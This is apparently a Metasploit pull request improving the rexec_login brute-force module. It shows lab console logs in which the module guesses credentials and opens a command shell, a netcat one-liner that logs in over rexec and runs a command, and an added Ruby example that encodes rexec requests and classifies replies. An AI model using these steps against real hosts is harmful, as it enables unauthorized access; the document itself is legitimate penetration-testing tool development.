
rexec_login improvements#21367

Open
g0tmi1k wants to merge 6 commits into rapid7:master from g0tmi1k:rexec

Conversation

@g0tmi1k (Contributor) commented Apr 23, 2026

Before

[*] Connected to the database specified in the YAML file
[*] Connected to msf. Connection type: postgresql. Connection name: OYGIkFxA.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
msf > use auxiliary/scanner/rservices/rexec_login
msf auxiliary(scanner/rservices/rexec_login) > options

Module options (auxiliary/scanner/rservices/rexec_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   CreateSession     true             no        Create a new session for every successful login
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   ENABLE_STDERR     false            yes       Enables connecting the stderr port
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS            10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             512              yes       The target port (TCP)
   STDERR_PORT                        no        The port to listen on for stderr
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf auxiliary(scanner/rservices/rexec_login) >
msf auxiliary(scanner/rservices/rexec_login) > run
[*] 10.0.0.10:512         - 10.0.0.10:512 - Starting rexec sweep
[*] 10.0.0.10:512         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/rservices/rexec_login) >
msf auxiliary(scanner/rservices/rexec_login) > set USERNAME msfadmin
USERNAME => msfadmin
msf auxiliary(scanner/rservices/rexec_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf auxiliary(scanner/rservices/rexec_login) >
msf auxiliary(scanner/rservices/rexec_login) > run
[*] 10.0.0.10:512         - 10.0.0.10:512 - Starting rexec sweep
[*] 10.0.0.10:512         - 10.0.0.10:512 - Attempting rexec with username:password 'msfadmin':'msfadmin'
[+] 10.0.0.10:512         - 10.0.0.10:512, rexec 'msfadmin' : 'msfadmin'
[*] Command shell session 1 opened (10.0.0.1:43005 -> 10.0.0.10:512) at 2026-04-23 17:07:43 +0100
[*] 10.0.0.10:512         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/rservices/rexec_login) >

After

msf auxiliary(scanner/rservices/rexec_login) > reload
[*] Reloading module...
msf auxiliary(scanner/rservices/rexec_login) >
msf auxiliary(scanner/rservices/rexec_login) > run
[*] 10.0.0.10:512         - Starting rexec sweep
[*] 10.0.0.10:512         - 10.0.0.10:512         - Skipping stderr call back
[*] 10.0.0.10:512         - 10.0.0.10:512         - [1/2] - Attempting rexec with msfadmin:msfadmin
[+] 10.0.0.10:512         - rexec successful login: msfadmin:msfadmin
[*] Command shell session 2 opened (10.0.0.1:39301 -> 10.0.0.10:512) at 2026-04-23 17:13:03 +0100
[*] 10.0.0.10:512         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/rservices/rexec_login) >

rDNS issue

$ sudo killall dnsmasq
$ sudo dnsmasq --interface=tap0 --bind-interfaces --dhcp-range=10.0.0.2,10.0.0.10,12h
$
$ { printf '0\0msfadmin\0msfadmin\0id\0'; sleep 2; } | nc 10.0.0.10 512
Where are you?
$
$ sudo killall dnsmasq
$ sudo dnsmasq --interface=tap0 --bind-interfaces --dhcp-range=10.0.0.2,10.0.0.10,12h --host-record=attacker,10.0.0.1
$
$ ssh1 msfadmin@10.0.0.10 sudo reboot -f
/etc/ssh/ssh_config line 52: Unsupported option "gssapiauthentication"
msfadmin@10.0.0.10's password:
[sudo] password for msfadmin: msfadmin
$
$ { printf '0\0msfadmin\0msfadmin\0id\0'; sleep 2; } | nc 10.0.0.10 512
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
$
msf auxiliary(scanner/rservices/rexec_login) > run
[*] 10.0.0.10:512         - Starting rexec sweep
[*] 10.0.0.10:512         - Skipping stderr call back
[*] 10.0.0.10:512         - Attempting rexec with msfadmin:msfadmin
[-] 10.0.0.10:512         - Result: Where are you?
[-] 10.0.0.10:512         - The rexecd service could not resolve a hostname for 10.0.0.1. Ensure a reverse DNS (PTR) record exists for your attacking host.
[-] 10.0.0.10:512         - 10.0.0.10:512         - [1/2] - Bruteforce cancelled against this service.
[*] 10.0.0.10:512         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/rservices/rexec_login) >
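Added example, not code from this PR or from Metasploit's rexec_login module: it builds the same rexec request that the `printf ... | nc 10.0.0.10 512` one-liner above sends, and classifies the reply so that `Where are you?` is reported as a reverse-DNS failure on the rexecd side rather than as a bad credential. The wire convention it assumes (four NUL-terminated fields in the request; a 0x00 status byte before command output or a 0x01 status byte before an error message in the reply) is the BSD rexecd behaviour, not something stated on this page, and the `Login incorrect.` reply in the usage section is a constructed sample.

```ruby
# Added example (not part of the PR or of Metasploit's rexec_login module).
# Assumed BSD rexecd wire format:
#   request: stderr_port "\0" username "\0" password "\0" command "\0"
#            (stderr_port is ASCII decimal; "0" = no separate stderr connection)
#   reply:   0x00 + command output on success, 0x01 + error text on rejection
REXEC_RDNS_HINT = 'Ensure a reverse DNS (PTR) record exists for your host.'

# Encode an rexec request. Fields may not contain NUL, since NUL is the
# field terminator and an embedded one would shift every later field.
def rexec_request(username, password, command, stderr_port: 0)
  [username, password, command].each do |field|
    if field.include?("\0")
      raise ArgumentError, "rexec field must not contain NUL: #{field.inspect}"
    end
  end
  [Integer(stderr_port).to_s, username, password, command].join("\0") + "\0"
end

# Map an rexecd reply to a status symbol plus the text that came with it.
def classify_rexec_reply(reply)
  return { status: :empty, message: '' } if reply.nil? || reply.empty?

  case reply.getbyte(0)
  when 0x00
    { status: :success, message: reply.byteslice(1..-1).to_s.chomp }
  when 0x01
    classify_rexec_error(reply.byteslice(1..-1).to_s.chomp)
  else
    # No status byte: only recognise the rDNS message, otherwise report unknown.
    text = reply.chomp
    rdns_failure?(text) ? rdns_failure(text) : { status: :unknown, message: text }
  end
end

# "Where are you?" is what rexecd sends when it cannot resolve the
# connecting address to a hostname; anything else is an ordinary rejection.
def classify_rexec_error(text)
  rdns_failure?(text) ? rdns_failure(text) : { status: :denied, message: text }
end

def rdns_failure?(text)
  text.start_with?('Where are you?')
end

def rdns_failure(text)
  { status: :rdns_failure, message: text, hint: REXEC_RDNS_HINT }
end

if $PROGRAM_NAME == __FILE__
  p rexec_request('msfadmin', 'msfadmin', 'id')
  # Constructed sample replies, not captured traffic.
  p classify_rexec_reply("\x01Where are you?\n")
  p classify_rexec_reply("\x00uid=1000(msfadmin) gid=1000(msfadmin)\n")
  p classify_rexec_reply("\x01Login incorrect.\n")
end
```

The request encoder reproduces the byte string from the PR's `printf`, so the two can be diffed directly; the classifier distinguishes the three outcomes an operator sees in the PR output (session opened, rejected credential, rDNS failure) and attaches the same PTR-record hint the updated module prints.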

@g0tmi1k g0tmi1k changed the title Rexec Rexec_login Apr 23, 2026
@g0tmi1k g0tmi1k changed the title Rexec_login rexec_login improvements Apr 23, 2026